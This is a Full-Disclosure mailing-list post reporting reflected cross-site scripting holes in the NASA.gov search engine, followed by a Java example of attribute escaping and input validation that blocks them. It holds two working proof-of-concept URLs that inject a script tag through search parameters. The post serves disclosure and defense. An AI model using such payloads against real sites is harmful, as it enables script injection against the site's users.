Hi there,

---------------------
WebSite:
Vendor: NASA w0w!
Risk: 7-5
--------------------
VENDOR NOTICED: Yes ( same email as this )
--------------------

I'm a little surprised today..... I found some cross site scripting holes in the NASA.gov search engine,
PROOF OF CONCEPT:

http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Simple+Search.y=10"><script>alert("The XSS Prince\nOnce upon a time there was a prince\nthat liked so much XSS exploits....");</script>

http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=null&Go.x=17"><script>alert("The%20XSS%20Prince\nOnce%20upon%20a%20time%20there%20was%20a%20prince\nthat%20liked%20so%20much%20XSS%20exploits....");</script>&Go.y=13

Remember: website security cannot be real if maintainers don't know how much danger is a xss hole ;-)

contact info:
__________
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->/* not csh but sh */
0x02->$ PATH=pretending!/usr/ucb/which sense
0x03-> no sense in pretending!
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
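
Both proof-of-concept URLs above use `">` inside an image-button coordinate value (`Simple Search.y`, `Go.x`) to close a quoted attribute. The server-side handling that stops this, as an added example that is not part of the original post and not the search application's code; the class and method names are hypothetical, and it assumes the values are echoed into double-quoted HTML attributes:

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Added example, not the search application's code. Assumption: parameters
// are echoed back into double-quoted HTML attributes of the result page.
public class ReflectedParamDemo {

    // Encode every character that can close an attribute value or open a tag.
    static String escapeAttr(String s) {
        StringBuilder out = new StringBuilder();
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Image-button coordinates (names ending in .x or .y) are only ever digits.
    static boolean isCoordinate(String name) {
        return name.endsWith(".x") || name.endsWith(".y");
    }

    // Returns the hidden field to emit, or "" when a coordinate fails validation.
    static String renderHidden(String name, String value) {
        if (isCoordinate(name) && !value.matches("[0-9]{1,5}")) {
            return ""; // reject instead of trying to repair the value
        }
        return "<input type=\"hidden\" name=\"" + escapeAttr(name)
             + "\" value=\"" + escapeAttr(value) + "\">";
    }

    public static void main(String[] args) {
        // Constructed sample values, as request.getParameter() would return them.
        Map<String, String> params = new LinkedHashMap<>();
        params.put("Go.x", "17\"><script>alert(1)</script>"); // shaped like the PoC
        params.put("Go.y", "13");                              // legitimate value
        params.put("nasaInclude", "null\"><b>");               // free-text case
        for (Map.Entry<String, String> e : params.entrySet()) {
            String html = renderHidden(e.getKey(), e.getValue());
            System.out.println(e.getKey() + " -> " + (html.isEmpty() ? "(dropped)" : html));
        }
    }
}
```

Strict validation handles fields with a known shape, and attribute encoding covers everything else that is reflected, so neither check has to be perfect on its own.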